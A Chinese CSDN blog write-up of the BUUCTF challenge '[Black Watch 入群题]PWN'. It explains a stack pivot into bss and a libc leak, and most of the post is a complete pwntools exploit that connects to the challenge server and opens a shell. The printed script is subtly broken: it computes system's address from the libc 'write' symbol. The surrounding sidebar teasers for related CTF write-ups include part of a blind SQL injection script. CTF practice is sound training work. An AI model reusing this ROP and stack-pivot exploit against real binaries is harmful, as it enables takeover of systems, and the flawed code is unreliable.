[Black Watch 入群题]PWN

最新推荐文章于 2023-08-01 20:38:25 发布
最新推荐文章于 2023-08-01 20:38:25 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121509131
版权

[Black Watch 入群题]PWN

使用checksec查看:
在这里插入图片描述

只开启了栈不可执行,拉进IDA中查看:
在这里插入图片描述
直接给了漏洞函数,跟进看:
在这里插入图片描述
变量s里面可写入0x200个字符,放在bss段中。变量buf里面可写入0x20个字符,但是并不能溢出。

可以联想到栈迁移的方法,将栈迁移到变量s所在的bss段中,s里面放上payload

这题没有system/bin/sh,需要先进行libc泄露再getshell

exp:

from pwn import *

#start
r = remote("node4.buuoj.cn",29289)
# r = process("../buu/[Black Watch 入群题]PWN")
elf = ELF("../buu/[Black Watch 入群题]PWN")
libc = ELF("../buu/ubuntu16(32).so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']
leave_ret = 0x8048408
bss_addr = 0x804A300

#attack
payload = p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
r.sendlineafter("name?",payload)
payload = b'M'*0x18 + p32(bss_addr-4) + p32(leave_ret)
r.sendlineafter(b"say?",payload)
write_addr = u32(r.recv(4))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['write']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
payload = p32(system_addr) + p32(main_addr) + p32(bin_sh_addr)
r.sendlineafter(b"name?",payload)
payload = b'M'*0x18 + p32(bss_addr-4) + p32(leave_ret)
r.sendlineafter(b"say?",payload)

r.interactive()

m0sway
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
一道pwn门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
warmup pwn
02-11
pwn
[Black Watch ]PWN-栈迁移
个人笔记
04-20 358
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出栈空间只有0x20-0x18=8字节无法构造rop,所以需要利用栈迁移技术,迁移到bss上构造rop。bss栈布局:(左边是第一泄露Libc构造栈帧,右边是第二次重写获取shell的栈帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。栈迁移操作:构造好栈中ebp新位置。思路:ret2shellcode。栈迁移关键指令:leave。
PWN · 栈迁移】[BUUCTF][Black Watch ]PWN
Mr_Fmnwon的博客
08-01 370
进能够覆盖ebp和ret,很难不往栈迁移上想。 修改ebp和ret后我们可以将栈指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发栈迁移的基本过程。 查看整个代码发现没有后门函数。 2.泄露libc 没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。 3.组合流程① read大量数据,可以是 aaaa + write.pl
津门杯2021CTF pwn
qq_39948058的博客
08-26 473
前言:这个一开始调通了,但是不知道正确的libc版本,远程没有打通,最后听了一下libc版本是11.4的libc2.23版本,才打通,很多洞,比较经典的是edit的READ容易写。写到freehook为onegadget即可,tcl,只解了一道,时间原因第二道pwn也没看,噗。。 漏洞点: 漏洞点这两个地方,他们都是在bss段里,而且位置比较临近可以直接考虑一下任意写,当时没太注意这个点,直接doublefree的,发现只给了4个chunk,所以没能构建出,又审计了一下edit R.
CTFPWN的一些型(持续更新......)
qq_44371274的博客
04-05 2112
ret2test 先运行一下,看程序做了些什么 发现只是让我们输一串字符。接下来具体分析下属性,并且丢进gdb里分析一下 可以看到这是一个64位的程序,而且什么保护都没有开,接下来拖进IDA里继续分析 我们进v4 F5反编译之后,可以很明显地看出程序有gets输漏洞,gets可以读取无限长的字符串,我们就可以利用这个漏洞造成了一个栈溢出 发现分配的栈的空间大小是70,由于程序在返回地址前...
【BUUCTF】[Black Watch ]PWN
m0_51251108的博客
12-27 388
【BUUCTF】[Black Watch ]PWN 记录下刷,方便自己以后回顾,写的很烂,还请见谅 本要用栈迁移 先checksec,file和nc看下程序 32位,动态链接,无canary和pie 思路:vul_function()里最后的read能栈溢出,但位置太短,不够写rop,运用栈迁移跳转至跳转至上一个read,写rop链,ret2libc后就能拿到shell了 主要是如何栈迁移: leave ret相当于: leave => mov esp, ebp; pop ebp
welpwn pwn
02-11
pwn
bugku pwnlibc
11-06
bugku pwnlibc,pwn3做时可在里面查找system、binsh等
pwn1 一道pwn练习
05-07
pwn练习
http,ftp,mail服务器架设为一体软件
05-28
首先,我们先来了解一下花生壳的到底有什么作用。因为ADSL每次拨号上网所获得的IP地址每次都是不同的,花生壳起到的作用就是方便用户访问我们的服务 器(只需要输域名便可),而不用每次都输IP地址那么麻烦(因为我们也不可能每次重新拨号上网后,又去告诉用户现在的服务器的IP地址什么)。<br><br>例如,我们的花生壳护照下有一个域名www.oray.net ,那么只要在电脑上用该护照登陆了花生壳客户端。当别人输www.oray.net的时候,会自动解析到那台电脑所在的网络的公网IP地址。<br><br>也就是说,具体的服务器,是要我们自己去设置完成的。而不同的上网方式,建立服务器的方式是不同的,下面介绍两种常见上网方法的服务器的建立。(这两个上网方法主要区别在于用来做服务器的计算机,能否得到公网的IP地址)。<br>
BUUCTF—WEB-WarmUp
weixin_45486362的博客
05-25 235
warm 来到目,一来就是一个表情包 在这里插图片描述 啥也不说,直接查看源代码 看见source.php的提示,直接加url进行访问 得到一段代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php",
BUUCTF密码基础——凯撒?替换?呵呵!
YIHAHUHA的博客
11-17 8483
凯撒?替换?呵呵! 凯撒密码一般就是26个字母经过单纯的按字母顺序来位移的加密方法(一般) 如:abc=def 进阶版的凯撒就不按照字母顺序的加密 如:abc=dhj 所以就要经过暴力破解出每一种可能的对应加密 看 前面的MTHJ和字符串中间的{}是明显的flag{}的格式,所以就推断这里的 MTHJ对应的明文就是flag 然后就对字符串中的其他20个字母进行爆破对比 可以写脚本(不会哈哈哈) ...
Buuoj刷记录
meteox的博客
08-09 4416
--- title: Buuoj刷记录 date: 2020-07-20 11:07:42 tags: 解 categories: ctf img: https://img.buuoj.cn/buugirl/img/1.png 记录buuoj写过的 web [HCTF 2018]WarmUp F12看到存在source.php,跳转后看到代码 <?php highlight_file(__FILE__); class emmm { publ
BUUCTF web WarmUp
weixin_45674567的博客
04-22 236
访问source.php获得一段源码 从代码中发现新的页面hint访问获得flag文件名,知道flag在。。。。。里 构造获取flag的语句 hint.php?../…/…/…/…/ffffllllaaaagggg 最后[原复现]HCTF 2018 Warmup这篇博客里面有更详细介绍,感觉我的就是搬来的 ...
[Black Watch ]Web
shinygod的博客
04-12 647
知识点:盲注 在这边抓个包 可以看到有个php文件 经过测试发现异或盲注可以 直接exp import time import re import requests import string url = "http://f32ba0ff-a985-43d9-8921-862260b1b16b.node4.buuoj.cn:81/backend/content_detail.php" flag = '' def payload(i, j): time.sleep(0.2) #
[Black Watch ]PWN 栈劫持的利用
半岛铁盒的博客
08-17 328
32位程序,开启了nx保护 没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 思路 第一次输的参数s,那边我们可以写很长的数据,我们可以将我们的rop链布置在那里, 接着执行第二次输,利用站劫持,把程序的执行流程劫持到第一次输的位置就可以了 站劫持利用 做栈劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场 payload1=‘a’*0x18+p32(s-4)+p32(leave_r
(第三周)
qq_62046696的博客
03-11 732
sess_根我们生成的sha256编码,上传进去了,还差那个文件是否存在,发现upload有mkdir(里面的就是/var/babyctf/$attr)这里的attr我们可以控制,目录!简单来说,file_exits,如果是文件目录都可以为true,文件上传保存在/var/babyctf/$attr/$username/文件名,如果attr=success.txt,那么sess就保存在它里面,最后更改phpsessID为我们上传的sha256的值。变成我们的flag不就可以了吗。s:3:"123";
栈迁移学习(buuctf [Black Watch ])
像初雪一样自由洒落
03-14 982
i春秋的borrowstack是栈迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己栈迁移学的不是很好,只是知道大概的意思,但是还没有做过,这次在看雪看到文章,就好好学一下,做到啦!! 栈迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向,详细可以看看这篇图示:https://b...
ctf 简单pwn资源
最新发布
08-09
CTF 简单 PWN 资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单目。这些目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取目提供的关键信息或获取系统控制权。 CTF 简单 PWN 目的资源可以在各种在线平台上找到,例如 CTF 竞赛中常用的CTFd、pwnable.kr 和 picoCTF 等。这些平台提供了大量不同难度的 PWN 目,从初学者到专业选手都能找到适合自己水平的目。 此外,还有一些开源项目和教程可以帮助学习简单 PWN 目的解决方法。例如,pwntools 是一个功能强大的 Python 库,提供了一系列与二进制漏洞利用相关的工具和函数。还有一些博客和视频教程,介绍了从门级到高级级别的 PWN技巧和常见漏洞的利用方式。 总结来说,CTF 简单 PWN 目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能的人们来说都是非常有价值的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值